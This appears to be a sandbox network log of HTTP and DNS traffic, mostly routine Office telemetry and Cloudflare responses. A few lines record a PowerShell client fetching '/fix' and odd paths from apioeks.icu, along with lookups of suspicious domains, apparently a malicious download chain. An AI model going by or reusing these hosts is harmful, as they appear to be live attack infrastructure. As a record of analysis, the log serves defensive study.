Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+B9tRCMpyxZbAHy&MD=ALPwh7gA HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?42cef695cf34825c08a6cc7e3c1133fa HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?6908cf5a6c8bf9b4fcacb1c08ea6b6ec HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?568de8f0c345c91edba2d12d40b3074d HTTP/1.1host: dual-s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?0c0bf2d7d87519af818c03c75484f319 HTTP/1.1host: dual-s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /fix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: apioeks.icuConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /apis/wiRsh/jJZDv HTTP/1.1User-Agent: Mozilla/5.0Host: apioeks.icu
Source: global traffic	HTTP traffic detected: GET /apic/Qkqxz/EJDGUe HTTP/1.1Host: apioeks.icu

Source: global traffic	DNS traffic detected: DNS query: gtoyorupaz.emlnk9.com
Source: global traffic	DNS traffic detected: DNS query: gtoyorupaz.activehosted.com
Source: global traffic	DNS traffic detected: DNS query: vstrrrlineproperrms.world
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: partner.booking.com
Source: global traffic	DNS traffic detected: DNS query: bstatic.com
Source: global traffic	DNS traffic detected: DNS query: cdn.cookielaw.org
Source: global traffic	DNS traffic detected: DNS query: munchkin.marketo.net
Source: global traffic	DNS traffic detected: DNS query: try.abtasty.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: apioeks.icu

Source: unknown

HTTP traffic detected: POST /report/v4?s=DR4Iqh%2BOUZTqvZX5XC%2Fj88e6kQgsRtajJlV%2B1xJRox%2FULPCXeX80X3SFxkm1xU8hA29yCWeHjmAkfVOxKtsk2YTefTfY2WhBWvjRsziDpRnYMUOVuS7KvGfzkb6dL3WrTndcAZGa0XRzPLN7 HTTP/1.1host: a.nel.cloudflare.comcontent-length: 391content-type: application/reports+jsonorigin: https://vstrrrlineproperrms.worlduser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 15:10:05 GMTcontent-type: text/html; charset=UTF-8content-encoding: zstdcf-ray: 946ead42bb4bd7ac-LAXaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="946ead42bb4bd7ac"x-content-type-options: nosniffx-frame-options: SAMEORIGINcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0expires: Thu, 01
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 15:10:06 GMTcontent-type: text/html; charset=UTF-8content-encoding: zstdcf-ray: 946ead484c10d7ac-LAXaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="946ead484c10d7ac"x-content-type-options: nosniffx-frame-options: SAMEORIGINcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0expires: Thu, 01
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:06 GMTcontent-type: text/html; charset=utf-8cf-ray: 946ead4baeb1d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: EXPIREDreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAratihEgLKMa1Imc0ywsf7xfFDfj1uRaAdY2xga5cNYQaFMhqhnR3X81upBuWxH6yI58QRvhCAb%2BL7CVKQAxkbT4qk06bfZ6VJDlPz6hYHpufFol43VsAbisXhtwpQOoAb2nbptFpy12Weo"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=167016&min_rtt=164385&rtt_var=3176&sent=78&recv=28&lost=0&retrans=0&sent_bytes=69118&recv_bytes=4085&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=1964&x=0"content-length: 169
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:08 GMTcontent-type: text/html; charset=utf-8cf-ray: 946ead562ee1d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: HITage: 2report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xh6OM3PSamcDhPWbEmCUjHzn86Q3a2G%2FpB43QxzcgbPV0bBYwLrdz3dwj%2B1FSYleIV5iMlAeQAyfEyLVUv4thJihAY856tS1h6EH4DUtEQ%2FICilSgmoD2UkLfXZfGLmNJ3p2lnTf6oC6lZ%2F1"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=166717&min_rtt=164385&rtt_var=2981&sent=81&recv=30&lost=0&retrans=0&sent_bytes=69827&recv_bytes=4138&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=3325&x=0"content-length: 169
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:20 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada0ee92d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwOj08xSfxCnl0YUCjXbyMld3DMPf3HTTH66OnfNbOL%2B5MzkXqC0DCGQNQeAeOi3sOjNVaNQHqSu0LeO5T07irt83j%2BBsZz2E1fJiLXpfjnTLFjcoRzz%2BtlvakUb%2B0HI1eLFocPA0Lt1nDb6"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=170833&min_rtt=164362&rtt_var=11495&sent=135&recv=69&lost=0&retrans=0&sent_bytes=100617&recv_bytes=14819&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=15599&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:20 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada0ee90d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9wB0tCh2S5gx5JYGnHOBPhkqTm1aAIHwWs6Z1mMsbxMTptKfTbZNt45Rett3i0fTntHfU0jWqARa8uTvM7cviRSZWux6wvZxHI1THvxOgP09yvGR9lyQ3wj8XJ%2FXwEfZWzonM35ebl627bj"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=170833&min_rtt=164362&rtt_var=11495&sent=144&recv=69&lost=0&retrans=0&sent_bytes=105470&recv_bytes=14819&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=15620&x=0"content-length: 169
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada46928d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwyoogi8xzf%2BIJXgdcE2E13z%2FNTnE5UFT6zHWTQQl%2FrEWf5VDnEsVnRXKmE3q%2Fo2x10zPrHdQrZd%2Bz6PiiF9T9jxr71QVHC8%2Ft7uKVi7oCDi%2FMSqGLb4Hy3xwtT7wv17ygbedsQTlD8QnsZ7"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=164868&min_rtt=164328&rtt_var=569&sent=176&recv=103&lost=0&retrans=0&sent_bytes=137892&recv_bytes=14975&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16161&x=0"content-length: 169
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada4590ed7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jv4uA98g%2BLyjxxKam0xPL%2Bx3Fer0nvEhLLfJjkltAq5QKgQAkBK3LS1kYnCyjZqVh71hyNp0kzz%2BNJVA2cwneFvsK0tFZVAK3Iy87yAG1Mn2%2F%2BK0vC2aRdcvqIqYqODv5mEo71j8uZ%2BwbCa%2B"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=164868&min_rtt=164328&rtt_var=569&sent=175&recv=103&lost=0&retrans=0&sent_bytes=137426&recv_bytes=14975&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16153&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7196dd7ac-LAXserver: cloudflarecontent-encoding: zstdage: 0cache-control: max-age=14400cf-cache-status: HITreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toFFut8mEB4GEG7JYYfoCCw7Yq7%2Fe0ApEiTleKi%2B4L5y48Mu83sFREqslVdUi8W7V3KUo0Z0w9aUfJQ1%2FIbUsIPPczg07Rog9xi3cCrRTNTZQ6976HwglqECfqbQHhBiKShgs4Y7U38n1n2I"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=164774&min_rtt=164317&rtt_var=151&sent=194&recv=126&lost=0&retrans=0&sent_bytes=140016&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16282&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7091ed7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7odA8pKHzFNYpzGds12NgsHNn8j%2F2K%2BBWRarDHwoj7o%2BghGxB12Vps5L9SuEESCS4sj7jwhaUMMh3J8BxRtLtQYgpWkqjSajoMwygXyFNOtoUQoiJDJW0N6Nx%2BETkp48ASEDbF0ZJGQgV7ii"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=197&recv=130&lost=0&retrans=0&sent_bytes=140714&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16577&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7195fd7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fdu6QOjeOp%2FM%2FS1dZiNKUb2T7nAmuIINx0KQ431Za8M9uStM730OiQVCheLQ8dL47pH3hIfITs2dfs6eRjTyuRbaByg21eFS%2BvVVgNJSWoSMuK3TrdidD2WbAeddFWgk9td7NFwPqotL9q53"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=198&recv=130&lost=0&retrans=0&sent_bytes=141182&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16582&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71962d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0CoqCp%2BHPbchkdsY2um6LP8eyWWoxwrSW4XrzqqLPcGzjvvUg6l55wo%2Bm%2F3nNFN%2Bid%2BmazcJi4woxwIANxD73JKN42s7ChAzMlKQuMxK2GjCfDxqlChDllF5%2Fl1Sjjy%2By2B8YMi8%2FkfUn9U"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=199&recv=130&lost=0&retrans=0&sent_bytes=141637&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16584&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71968d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMSGJ%2FR7lhNhus6xiOgPT1JxJCElMzQ92um46aVG%2BDQWyTCJlFxpiTaPkTvYo9c3YrYTNjrHsKP9a9dZRNa90TVlwSi6zCxk%2Fnqk8uXUiN9h%2FxKKq0o7pn7GEhpR0SYvzbasGrSz2RQZADfe"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=202&recv=130&lost=0&retrans=0&sent_bytes=142340&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16586&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7196bd7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzt7Jj6Xd8MVHyi%2BMamFpwtcrFSX7i%2BwqConHeZzzqdEknNEVsSH2HdaS7gK40jqmzI2oadIjYn3yoitjm3Inpo8Lt%2Bq71a9ZidXi3q7CxTHn0hkM3hnFvxDLQEZmmjpDZ5rHM4%2Bvmr4Ou9H"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=211&recv=130&lost=0&retrans=0&sent_bytes=144447&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16607&x=0"content-length: 169
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7196ad7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uz10xFPbbcGx1xozK1b5KUmABid3eit%2BmcUOuujhSqHtsBznkcS4Lqu17xIxTFQSHYVUldkquADLD8Q5MzDtoD4BrIBa8qhyO1S%2F5AjF95tH9s54lUn4Ep907%2FuzdMEOS6tOO2Am4kX1%2FFLb"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=209&recv=130&lost=0&retrans=0&sent_bytes=143488&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16599&x=0"content-length: 173
